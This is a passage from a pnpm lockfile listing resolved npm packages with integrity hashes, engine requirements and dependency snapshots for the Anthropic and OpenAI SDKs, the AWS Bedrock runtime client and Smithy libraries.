sha512-nagl3RYrbNv6kQkeJIpt6NJZy8twLB/2vtz6yN9Z4vRKHN4/QZJIEbqohALSgwKdnksuY3k5Addp5lg8sVoVcQ==} - - emoji-regex@8.0.0: - resolution: {integrity: sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==} - - emoji-regex@9.2.2: - resolution: {integrity: sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==} - - escodegen@2.1.0: - resolution: {integrity: sha512-2NlIDTwUWJN0mRPQOdtQBzbUHvdGY2P1VXSyU83Q3xKxM7WHX2Ql8dKq782Q9TgQUNOLEzEYu9bzLNj1q88I5w==} - engines: {node: '>=6.0'} - hasBin: true - - esprima@4.0.1: - resolution: {integrity: sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==} - engines: {node: '>=4'} - hasBin: true - - estraverse@5.3.0: - resolution: {integrity: sha512-MMdARuVEQziNTeJD8DgMqmhwR11BRQ/cBP+pLtYdSTnf3MIO8fFeiINEbX36ZdNlfU/7A9f3gUw49B3oQsvwBA==} - engines: {node: '>=4.0'} - - esutils@2.0.3: - resolution: {integrity: sha512-kVscqXk4OCp68SZ0dkgEKVi6/8ij300KBWTJq32P/dYeWTSwK41WyTxalN1eRmA5Z9UU/LX9D7FWSmV9SAYx6g==} - engines: {node: '>=0.10.0'} - - extend@3.0.2: - resolution: {integrity: sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==} - - fast-deep-equal@3.1.3: - resolution: {integrity: sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==} - - fast-uri@3.1.0: - resolution: {integrity: sha512-iPeeDKJSWf4IEOasVVrknXpaBV0IApz/gp7S2bb7Z4Lljbl2MGJRqInZiUrQwV16cpzw/D3S5j5Julj/gT52AA==} - - fast-xml-builder@1.1.4: - resolution: {integrity: sha512-f2jhpN4Eccy0/Uz9csxh3Nu6q4ErKxf0XIsasomfOihuSUa3/xw6w8dnOtCDgEItQFJG8KyXPzQXzcODDrrbOg==} - - fast-xml-parser@5.4.1: - resolution: {integrity: sha512-BQ30U1mKkvXQXXkAGcuyUA/GA26oEB7NzOtsxCDtyu62sjGw5QraKFhx2Em3WQNjPw9PG6MQ9yuIIgkSDfGu5A==} - hasBin: true - - fetch-blob@3.2.0: - resolution: {integrity: sha512-7yAQpD2UMJzLi1Dqv7qFYnPbaPx7ZfFK6PiIxQ4PfkGPyNyl2Ugx+a/umUonmKqjhM4DnfbMvdX6otXq83soQQ==} - engines: {node: ^12.20 || >= 14.13} - - foreground-child@3.3.1: - resolution: {integrity: sha512-gIXjKqtFuWEgzFRJA9WCQeSJLZDjgJUOMCMzxtvFq/37KojM1BFGufqsCy0r4qSQmYLsZYMeyRqzIWOMup03sw==} - engines: {node: '>=14'} - - formdata-polyfill@4.0.10: - resolution: {integrity: sha512-buewHzMvYL29jdeQTVILecSaZKnt/RJWjoZCF5OW60Z67/GmSLBkOFM7qh1PI3zFNtJbaZL5eQu1vLfazOwj4g==} - engines: {node: '>=12.20.0'} - - gaxios@7.1.3: - resolution: {integrity: sha512-YGGyuEdVIjqxkxVH1pUTMY/XtmmsApXrCVv5EU25iX6inEPbV+VakJfLealkBtJN69AQmh1eGOdCl9Sm1UP6XQ==} - engines: {node: '>=18'} - - gcp-metadata@8.1.2: - resolution: {integrity: sha512-zV/5HKTfCeKWnxG0Dmrw51hEWFGfcF2xiXqcA3+J90WDuP0SvoiSO5ORvcBsifmx/FoIjgQN3oNOGaQ5PhLFkg==} - engines: {node: '>=18'} - - get-uri@6.0.5: - resolution: {integrity: sha512-b1O07XYq8eRuVzBNgJLstU6FYc1tS6wnMtF1I1D9lE8LxZSOGZ7LhxN54yPP6mGw5f2CkXY2BQUL9Fx41qvcIg==} - engines: {node: '>= 14'} - - glob@10.5.0: - resolution: {integrity: sha512-DfXN8DfhJ7NH3Oe7cFmu3NCu1wKbkReJ8TorzSAFbSKrlNaQSKfIzqYqVY8zlbs2NLBbWpRiU52GX2PbaBVNkg==} - deprecated: Old versions of glob are not supported, and contain widely publicized security vulnerabilities, which have been fixed in the current version. Please update. Support for old versions may be purchased (at exorbitant rates) by contacting i@izs.me - hasBin: true - - google-auth-library@10.6.1: - resolution: {integrity: sha512-5awwuLrzNol+pFDmKJd0dKtZ0fPLAtoA5p7YO4ODsDu6ONJUVqbYwvv8y2ZBO5MBNp9TJXigB19710kYpBPdtA==} - engines: {node: '>=18'} - - google-logging-utils@1.1.3: - resolution: {integrity: sha512-eAmLkjDjAFCVXg7A1unxHsLf961m6y17QFqXqAXGj/gVkKFrEICfStRfwUlGNfeCEjNRa32JEWOUTlYXPyyKvA==} - engines: {node: '>=14'} - - http-proxy-agent@7.0.2: - resolution: {integrity: sha512-T1gkAiYYDWYx3V5Bmyu7HcfcvL7mUrTWiM6yOfa3PIphViJ/gFPbvidQ+veqSOHci/PxBcDabeUNCzpOODJZig==} - engines: {node: '>= 14'} - - https-proxy-agent@7.0.6: - resolution: {integrity: sha512-vK9P5/iUfdl95AI+JVyUuIcVtd4ofvtrOr3HNtM2yxC9bnMbEdp3x01OhQNnjb8IJYi38VlTE3mBXwcfvywuSw==} - engines: {node: '>= 14'} - - ip-address@10.1.0: - resolution: {integrity: sha512-XXADHxXmvT9+CRxhXg56LJovE+bmWnEWB78LB83VZTprKTmaC5QfruXocxzTZ2Kl0DNwKuBdlIhjL8LeY8Sf8Q==} - engines: {node: '>= 12'} - - is-fullwidth-code-point@3.0.0: - resolution: {integrity: sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==} - engines: {node: '>=8'} - - isexe@2.0.0: - resolution: {integrity: sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==} - - jackspeak@3.4.3: - resolution: {integrity: sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw==} - - json-bigint@1.0.0: - resolution: {integrity: sha512-SiPv/8VpZuWbvLSMtTDU8hEfrZWg/mH/nV/b4o0CYbSxu1UIQPLdwKOCIyLQX+VIPO5vrLX3i8qtqFyhdPSUSQ==} - - json-schema-to-ts@3.1.1: - resolution: {integrity: sha512-+DWg8jCJG2TEnpy7kOm/7/AxaYoaRbjVB4LFZLySZlWn8exGs3A4OLJR966cVvU26N7X9TWxl+Jsw7dzAqKT6g==} - engines: {node: '>=16'} - - json-schema-traverse@1.0.0: - resolution: {integrity: sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==} - - jwa@2.0.1: - resolution: {integrity: sha512-hRF04fqJIP8Abbkq5NKGN0Bbr3JxlQ+qhZufXVr0DvujKy93ZCbXZMHDL4EOtodSbCWxOqR8MS1tXA5hwqCXDg==} - - jws@4.0.1: - resolution: {integrity: sha512-EKI/M/yqPncGUUh44xz0PxSidXFr/+r0pA70+gIYhjv+et7yxM+s29Y+VGDkovRofQem0fs7Uvf4+YmAdyRduA==} - - long@5.3.2: - resolution: {integrity: sha512-mNAgZ1GmyNhD7AuqnTG3/VQ26o760+ZYBPKjPvugO8+nLbYfX6TVpJPseBvopbdY+qpZ/lKUnmEc1LeZYS3QAA==} - - lru-cache@10.4.3: - resolution: {integrity: sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ==} - - lru-cache@7.18.3: - resolution: {integrity: sha512-jumlc0BIUrS3qJGgIkWZsyfAM7NCWiBcCDhnd+3NNM5KbBmLTgHVfWBcg6W+rLUsIpzpERPsvwUP7CckAQSOoA==} - engines: {node: '>=12'} - - minimatch@9.0.9: - resolution: {integrity: sha512-OBwBN9AL4dqmETlpS2zasx+vTeWclWzkblfZk7KTA5j3jeOONz/tRCnZomUyvNg83wL5Zv9Ss6HMJXAgL8R2Yg==} - engines: {node: '>=16 || 14 >=14.17'} - - minipass@7.1.3: - resolution: {integrity: sha512-tEBHqDnIoM/1rXME1zgka9g6Q2lcoCkxHLuc7ODJ5BxbP5d4c2Z5cGgtXAku59200Cx7diuHTOYfSBD8n6mm8A==} - engines: {node: '>=16 || 14 >=14.17'} - - ms@2.1.3: - resolution: {integrity: sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==} - - netmask@2.0.2: - resolution: {integrity: sha512-dBpDMdxv9Irdq66304OLfEmQ9tbNRFnFTuZiLo+bD+r332bBmMJ8GBLXklIXXgxd3+v9+KUnZaUR5PJMa75Gsg==} - engines: {node: '>= 0.4.0'} - - node-domexception@1.0.0: - resolution: {integrity: sha512-/jKZoMpw0F8GRwl4/eLROPA3cfcXtLApP0QzLmUT/HuPCZWyB7IY9ZrMeKw2O/nFIqPQB3PVM9aYm0F312AXDQ==} - engines: {node: '>=10.5.0'} - deprecated: Use your platform's native DOMException instead - - node-fetch@3.3.2: - resolution: {integrity: sha512-dRB78srN/l6gqWulah9SrxeYnxeddIG30+GOqK/9OlLVyLg3HPnr6SqOWTWOXKRwC2eGYCkZ59NNuSgvSrpgOA==} - engines: {node: ^12.20.0 || ^14.13.1 || >=16.0.0} - - openai@6.26.0: - resolution: {integrity: sha512-zd23dbWTjiJ6sSAX6s0HrCZi41JwTA1bQVs0wLQPZ2/5o2gxOJA5wh7yOAUgwYybfhDXyhwlpeQf7Mlgx8EOCA==} - hasBin: true - peerDependencies: - ws: ^8.18.0 - zod: ^3.25 || ^4.0 - peerDependenciesMeta: - ws: - optional: true - zod: - optional: true - - p-retry@4.6.2: - resolution: {integrity: sha512-312Id396EbJdvRONlngUx0NydfrIQ5lsYu0znKVUzVvArzEIt08V1qhtyESbGVd1FGX7UKtiFp5uwKZdM8wIuQ==} - engines: {node: '>=8'} - - pac-proxy-agent@7.2.0: - resolution: {integrity: sha512-TEB8ESquiLMc0lV8vcd5Ql/JAKAoyzHFXaStwjkzpOpC5Yv+pIzLfHvjTSdf3vpa2bMiUQrg9i6276yn8666aA==} - engines: {node: '>= 14'} - - pac-resolver@7.0.1: - resolution: {integrity: sha512-5NPgf87AT2STgwa2ntRMr45jTKrYBGkVU36yT0ig/n/GMAa3oPqhZfIQ2kMEimReg0+t9kZViDVZ83qfVUlckg==} - engines: {node: '>= 14'} - - package-json-from-dist@1.0.1: - resolution: {integrity: sha512-UEZIS3/by4OC8vL3P2dTXRETpebLI2NiI5vIrjaD/5UtrkFX/tNbwjTSRAGC/+7CAo2pIcBaRgWmcBBHcsaCIw==} - - path-expression-matcher@1.1.3: - resolution: {integrity: sha512-qdVgY8KXmVdJZRSS1JdEPOKPdTiEK/pi0RkcT2sw1RhXxohdujUlJFPuS1TSkevZ9vzd3ZlL7ULl1MHGTApKzQ==} - engines: {node: '>=14.0.0'} - - path-key@3.1.1: - resolution: {integrity: sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==} - engines: {node: '>=8'} - - path-scurry@1.11.1: - resolution: {integrity: sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA==} - engines: {node: '>=16 || 14 >=14.18'} - - protobufjs@7.5.4: - resolution: {integrity: sha512-CvexbZtbov6jW2eXAvLukXjXUW1TzFaivC46BpWc/3BpcCysb5Vffu+B3XHMm8lVEuy2Mm4XGex8hBSg1yapPg==} - engines: {node: '>=12.0.0'} - - proxy-agent@6.5.0: - resolution: {integrity: sha512-TmatMXdr2KlRiA2CyDu8GqR8EjahTG3aY3nXjdzFyoZbmB8hrBsTyMezhULIXKnC0jpfjlmiZ3+EaCzoInSu/A==} - engines: {node: '>= 14'} - - proxy-from-env@1.1.0: - resolution: {integrity: sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg==} - - require-from-string@2.0.2: - resolution: {integrity: sha512-Xf0nWe6RseziFMu+Ap9biiUbmplq6S9/p+7w7YXP/JBHhrUDDUhwa+vANyubuqfZWTveU//DYVGsDG7RKL/vEw==} - engines: {node: '>=0.10.0'} - - retry@0.13.1: - resolution: {integrity: sha512-XQBQ3I8W1Cge0Seh+6gjj03LbmRFWuoszgK9ooCpwYIrhhoO80pfq4cUkU5DkknwfOfFteRwlZ56PYOGYyFWdg==} - engines: {node: '>= 4'} - - rimraf@5.0.10: - resolution: {integrity: sha512-l0OE8wL34P4nJH/H2ffoaniAokM2qSmrtXHmlpvYr5AVVX8msAyW0l8NVJFDxlSK4u3Uh/f41cQheDVdnYijwQ==} - hasBin: true - - safe-buffer@5.2.1: - resolution: {integrity: sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==} - - shebang-command@2.0.0: - resolution: {integrity: sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==} - engines: {node: '>=8'} - - shebang-regex@3.0.0: - resolution: {integrity: sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==} - engines: {node: '>=8'} - - signal-exit@4.1.0: - resolution: {integrity: sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==} - engines: {node: '>=14'} - - smart-buffer@4.2.0: - resolution: {integrity: sha512-94hK0Hh8rPqQl2xXc3HsaBoOXKV20MToPkcXvwbISWLEs+64sBq5kFgn2kJDHb1Pry9yrP0dxrCI9RRci7RXKg==} - engines: {node: '>= 6.0.0', npm: '>= 3.0.0'} - - socks-proxy-agent@8.0.5: - resolution: {integrity: sha512-HehCEsotFqbPW9sJ8WVYB6UbmIMv7kUUORIF2Nncq4VQvBfNBLibW9YZR5dlYCSUhwcD628pRllm7n+E+YTzJw==} - engines: {node: '>= 14'} - - socks@2.8.7: - resolution: {integrity: sha512-HLpt+uLy/pxB+bum/9DzAgiKS8CX1EvbWxI4zlmgGCExImLdiad2iCwXT5Z4c9c3Eq8rP2318mPW2c+QbtjK8A==} - engines: {node: '>= 10.0.0', npm: '>= 3.0.0'} - - source-map@0.6.1: - resolution: {integrity: sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==} - engines: {node: '>=0.10.0'} - - string-width@4.2.3: - resolution: {integrity: sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==} - engines: {node: '>=8'} - - string-width@5.1.2: - resolution: {integrity: sha512-HnLOCR3vjcY8beoNLtcjZ5/nxn2afmME6lhrDrebokqMap+XbeW8n9TXpPDOqdGK5qcI3oT0GKTW6wC7EMiVqA==} - engines: {node: '>=12'} - - strip-ansi@6.0.1: - resolution: {integrity: sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==} - engines: {node: '>=8'} - - strip-ansi@7.2.0: - resolution: {integrity: sha512-yDPMNjp4WyfYBkHnjIRLfca1i6KMyGCtsVgoKe/z1+6vukgaENdgGBZt+ZmKPc4gavvEZ5OgHfHdrazhgNyG7w==} - engines: {node: '>=12'} - - strnum@2.2.0: - resolution: {integrity: sha512-Y7Bj8XyJxnPAORMZj/xltsfo55uOiyHcU2tnAVzHUnSJR/KsEX+9RoDeXEnsXtl/CX4fAcrt64gZ13aGaWPeBg==} - - ts-algebra@2.0.0: - resolution: {integrity: sha512-FPAhNPFMrkwz76P7cdjdmiShwMynZYN6SgOujD1urY4oNm80Ou9oMdmbR45LotcKOXoy7wSmHkRFE6Mxbrhefw==} - - tslib@2.8.1: - resolution: {integrity: sha512-oJFu94HQb+KVduSUQL7wnpmqnfmLsOA/nAh6b6EH0wCEoK0/mPeXU6c3wKDV83MkOuHPRHtSXKKU99IBazS/2w==} - - undici-types@7.18.2: - resolution: {integrity: sha512-AsuCzffGHJybSaRrmr5eHr81mwJU3kjw6M+uprWvCXiNeN9SOGwQ3Jn8jb8m3Z6izVgknn1R0FTCEAP2QrLY/w==} - - undici@7.24.4: - resolution: {integrity: sha512-BM/JzwwaRXxrLdElV2Uo6cTLEjhSb3WXboncJamZ15NgUURmvlXvxa6xkwIOILIjPNo9i8ku136ZvWV0Uly8+w==} - engines: {node: '>=20.18.1'} - - web-streams-polyfill@3.3.3: - resolution: {integrity: sha512-d2JWLCivmZYTSIoge9MsgFCZrt571BikcWGYkjC1khllbTeDlGqZ2D8vD8E/lJa8WGWbb7Plm8/XJYV7IJHZZw==} - engines: {node: '>= 8'} - - which@2.0.2: - resolution: {integrity: sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==} - engines: {node: '>= 8'} - hasBin: true - - wrap-ansi@7.0.0: - resolution: {integrity: sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==} - engines: {node: '>=10'} - - wrap-ansi@8.1.0: - resolution: {integrity: sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ==} - engines: {node: '>=12'} - - ws@8.19.0: - resolution: {integrity: sha512-blAT2mjOEIi0ZzruJfIhb3nps74PRWTCz1IjglWEEpQl5XS/UNama6u2/rjFkDDouqr4L67ry+1aGIALViWjDg==} - engines: {node: '>=10.0.0'} - peerDependencies: - bufferutil: ^4.0.1 - utf-8-validate: '>=5.0.2' - peerDependenciesMeta: - bufferutil: - optional: true - utf-8-validate: - optional: true - - zod-to-json-schema@3.25.1: - resolution: {integrity: sha512-pM/SU9d3YAggzi6MtR4h7ruuQlqKtad8e9S0fmxcMi+ueAK5Korys/aWcV9LIIHTVbj01NdzxcnXSN+O74ZIVA==} - peerDependencies: - zod: ^3.25 || ^4 - - zod@4.3.6: - resolution: {integrity: sha512-rftlrkhHZOcjDwkGlnUtZZkvaPHCsDATp4pGpuOOMDaTdDDXF91wuVDJoWoPsKX/3YPQ5fHuF3STjcYyKr+Qhg==} - -snapshots: - - '@anthropic-ai/sdk@0.73.0(zod@4.3.6)': - dependencies: - json-schema-to-ts: 3.1.1 - optionalDependencies: - zod: 4.3.6 - - '@aws-crypto/crc32@5.2.0': - dependencies: - '@aws-crypto/util': 5.2.0 - '@aws-sdk/types': 3.973.6 - tslib: 2.8.1 - - '@aws-crypto/sha256-browser@5.2.0': - dependencies: - '@aws-crypto/sha256-js': 5.2.0 - '@aws-crypto/supports-web-crypto': 5.2.0 - '@aws-crypto/util': 5.2.0 - '@aws-sdk/types': 3.973.6 - '@aws-sdk/util-locate-window': 3.965.5 - '@smithy/util-utf8': 2.3.0 - tslib: 2.8.1 - - '@aws-crypto/sha256-js@5.2.0': - dependencies: - '@aws-crypto/util': 5.2.0 - '@aws-sdk/types': 3.973.6 - tslib: 2.8.1 - - '@aws-crypto/supports-web-crypto@5.2.0': - dependencies: - tslib: 2.8.1 - - '@aws-crypto/util@5.2.0': - dependencies: - '@aws-sdk/types': 3.973.6 - '@smithy/util-utf8': 2.3.0 - tslib: 2.8.1 - - '@aws-sdk/client-bedrock-runtime@3.1009.0': - dependencies: - '@aws-crypto/sha256-browser': 5.2.0 - '@aws-crypto/sha256-js': 5.2.0 - '@aws-sdk/core': 3.973.20 - '@aws-sdk/credential-provider-node': 3.972.21 - '@aws-sdk/eventstream-handler-node': 3.972.11 - '@aws-sdk/middleware-eventstream': 3.972.8 - '@aws-sdk/middleware-host-header': 3.972.8 - '@aws-sdk/middleware-logger': 3.972.8 - '@aws-sdk/middleware-recursion-detection': 3.972.8 - '@aws-sdk/middleware-user-agent': 3.972.21 - '@aws-sdk/middleware-websocket': 3.972.13 - '@aws-sdk/region-config-resolver': 3.972.8 - '@aws-sdk/token-providers': 3.1009.0 - '@aws-sdk/types': 3.973.6 - '@aws-sdk/util-endpoints': 3.996.5 - '@aws-sdk/util-user-agent-browser': 3.972.8 - '@aws-sdk/util-user-agent-node': 3.973.7 - '@smithy/config-resolver': 4.4.11 - '@smithy/core': 3.23.12 - '@smithy/eventstream-serde-browser': 4.2.12 - '@smithy/eventstream-serde-config-resolver': 4.3.12 - '@smithy/eventstream-serde-node': 4.2.12 - '@smithy/fetch-http-handler': 5.3.15 - '@smithy/hash-node': 4.2.12 - '@smithy/invalid-dependency': 4.2.12 - '@smithy/middleware-content-length': 4.2.12 - '@smithy/middleware-endpoint': 4.4.26 - '@smithy/middleware-retry': 4.4.43 - '@smithy/middleware-serde': 4.2.15 - '@smithy/middleware-stack': 4.2.12 - '@smithy/node-config-provider': 4.3.12 - '@smithy/node-http-handler': 4.5.0 - '@smithy/protocol-http': 5.3.12 - '@smithy/smithy-client': 4.12.6 - '@smithy/types': 4.13.1 - '@smithy/url-parser': 4.2.12 - '@smithy/util-base64': 4.3.2 - '@smithy/util-body-length-browser': 4.2.2 - '@smithy/util-body-length-node': 4.2.3 - '@smithy/util-defaults-mode-browser': 4.3.42 - '@smithy/util-defaults-mode-node': 4.2.45 - '@smithy/util-endpoints': 3.3.3 - '@smithy/util-middleware': 4.2.12 - '@smithy/util-retry': 4.2.12 - '@smithy/util-stream': 4.5.20 - '@smithy/util-utf8': 4.2.2 - tslib: 2.8.1 - transitivePeerDependencies: - - aws-crt - - '@aws-sdk/core@3.973.20': - dependencies: - '@aws-sdk/types': 3.973.6 - '@aws-sdk/xml-builder': 3.972.11 - '@smithy/core': 3.23.12 - '@smithy/node-config-provider': 4.3.12 - '@smithy/property-provider': 4.2.12 - '@smithy/protocol-http': 5.3.12 - '@smithy/signature-v4': 5.3.12 - '@smithy/smithy-client': 4.12.6 - '@smithy/types': 4.13.1 - '@smithy/util-base64': 4.3.2 - '@smithy/util-middleware': 4.2.12 - '@smithy/util-utf8': 4.2.2 - tslib: 2.8.1 - - '@aws-sdk/credential-provider-env@3.972.18': - dependencies: - '@aws-sdk/core': 3.973.20 - '@aws-sdk/types': 3.973.6 - '@smithy/property-provider': 4.2.12 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@aws-sdk/credential-provider-http@3.972.20': - dependencies: - '@aws-sdk/core': 3.973.20 - '@aws-sdk/types': 3.973.6 - '@smithy/fetch-http-handler': 5.3.15 - '@smithy/node-http-handler': 4.5.0 - '@smithy/property-provider': 4.2.12 - '@smithy/protocol-http': 5.3.12 - '@smithy/smithy-client': 4.12.6 - '@smithy/types': 4.13.1 - '@smithy/util-stream': 4.5.20 - tslib: 2.8.1 - - '@aws-sdk/credential-provider-ini@3.972.20': - dependencies: - '@aws-sdk/core': 3.973.20 - '@aws-sdk/credential-provider-env': 3.972.18 - '@aws-sdk/credential-provider-http': 3.972.20 - '@aws-sdk/credential-provider-login': 3.972.20 - '@aws-sdk/credential-provider-process': 3.972.18 - '@aws-sdk/credential-provider-sso': 3.972.20 - '@aws-sdk/credential-provider-web-identity': 3.972.20 - '@aws-sdk/nested-clients': 3.996.10 - '@aws-sdk/types': 3.973.6 - '@smithy/credential-provider-imds': 4.2.12 - '@smithy/property-provider': 4.2.12 - '@smithy/shared-ini-file-loader': 4.4.7 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - transitivePeerDependencies: - - aws-crt - - '@aws-sdk/credential-provider-login@3.972.20': - dependencies: - '@aws-sdk/core': 3.973.20 - '@aws-sdk/nested-clients': 3.996.10 - '@aws-sdk/types': 3.973.6 - '@smithy/property-provider': 4.2.12 - '@smithy/protocol-http': 5.3.12 - '@smithy/shared-ini-file-loader': 4.4.7 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - transitivePeerDependencies: - - aws-crt - - '@aws-sdk/credential-provider-node@3.972.21': - dependencies: - '@aws-sdk/credential-provider-env': 3.972.18 - '@aws-sdk/credential-provider-http': 3.972.20 - '@aws-sdk/credential-provider-ini': 3.972.20 - '@aws-sdk/credential-provider-process': 3.972.18 - '@aws-sdk/credential-provider-sso': 3.972.20 - '@aws-sdk/credential-provider-web-identity': 3.972.20 - '@aws-sdk/types': 3.973.6 - '@smithy/credential-provider-imds': 4.2.12 - '@smithy/property-provider': 4.2.12 - '@smithy/shared-ini-file-loader': 4.4.7 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - transitivePeerDependencies: - - aws-crt - - '@aws-sdk/credential-provider-process@3.972.18': - dependencies: - '@aws-sdk/core': 3.973.20 - '@aws-sdk/types': 3.973.6 - '@smithy/property-provider': 4.2.12 - '@smithy/shared-ini-file-loader': 4.4.7 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@aws-sdk/credential-provider-sso@3.972.20': - dependencies: - '@aws-sdk/core': 3.973.20 - '@aws-sdk/nested-clients': 3.996.10 - '@aws-sdk/token-providers': 3.1009.0 - '@aws-sdk/types': 3.973.6 - '@smithy/property-provider': 4.2.12 - '@smithy/shared-ini-file-loader': 4.4.7 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - transitivePeerDependencies: - - aws-crt - - '@aws-sdk/credential-provider-web-identity@3.972.20': - dependencies: - '@aws-sdk/core': 3.973.20 - '@aws-sdk/nested-clients': 3.996.10 - '@aws-sdk/types': 3.973.6 - '@smithy/property-provider': 4.2.12 - '@smithy/shared-ini-file-loader': 4.4.7 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - transitivePeerDependencies: - - aws-crt - - '@aws-sdk/eventstream-handler-node@3.972.11': - dependencies: - '@aws-sdk/types': 3.973.6 - '@smithy/eventstream-codec': 4.2.12 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@aws-sdk/middleware-eventstream@3.972.8': - dependencies: - '@aws-sdk/types': 3.973.6 - '@smithy/protocol-http': 5.3.12 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@aws-sdk/middleware-host-header@3.972.8': - dependencies: - '@aws-sdk/types': 3.973.6 - '@smithy/protocol-http': 5.3.12 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@aws-sdk/middleware-logger@3.972.8': - dependencies: - '@aws-sdk/types': 3.973.6 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@aws-sdk/middleware-recursion-detection@3.972.8': - dependencies: - '@aws-sdk/types': 3.973.6 - '@aws/lambda-invoke-store': 0.2.4 - '@smithy/protocol-http': 5.3.12 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@aws-sdk/middleware-user-agent@3.972.21': - dependencies: - '@aws-sdk/core': 3.973.20 - '@aws-sdk/types': 3.973.6 - '@aws-sdk/util-endpoints': 3.996.5 - '@smithy/core': 3.23.12 - '@smithy/protocol-http': 5.3.12 - '@smithy/types': 4.13.1 - '@smithy/util-retry': 4.2.12 - tslib: 2.8.1 - - '@aws-sdk/middleware-websocket@3.972.13': - dependencies: - '@aws-sdk/types': 3.973.6 - '@aws-sdk/util-format-url': 3.972.8 - '@smithy/eventstream-codec': 4.2.12 - '@smithy/eventstream-serde-browser': 4.2.12 - '@smithy/fetch-http-handler': 5.3.15 - '@smithy/protocol-http': 5.3.12 - '@smithy/signature-v4': 5.3.12 - '@smithy/types': 4.13.1 - '@smithy/util-base64': 4.3.2 - '@smithy/util-hex-encoding': 4.2.2 - '@smithy/util-utf8': 4.2.2 - tslib: 2.8.1 - - '@aws-sdk/nested-clients@3.996.10': - dependencies: - '@aws-crypto/sha256-browser': 5.2.0 - '@aws-crypto/sha256-js': 5.2.0 - '@aws-sdk/core': 3.973.20 - '@aws-sdk/middleware-host-header': 3.972.8 - '@aws-sdk/middleware-logger': 3.972.8 - '@aws-sdk/middleware-recursion-detection': 3.972.8 - '@aws-sdk/middleware-user-agent': 3.972.21 - '@aws-sdk/region-config-resolver': 3.972.8 - '@aws-sdk/types': 3.973.6 - '@aws-sdk/util-endpoints': 3.996.5 - '@aws-sdk/util-user-agent-browser': 3.972.8 - '@aws-sdk/util-user-agent-node': 3.973.7 - '@smithy/config-resolver': 4.4.11 - '@smithy/core': 3.23.12 - '@smithy/fetch-http-handler': 5.3.15 - '@smithy/hash-node': 4.2.12 - '@smithy/invalid-dependency': 4.2.12 - '@smithy/middleware-content-length': 4.2.12 - 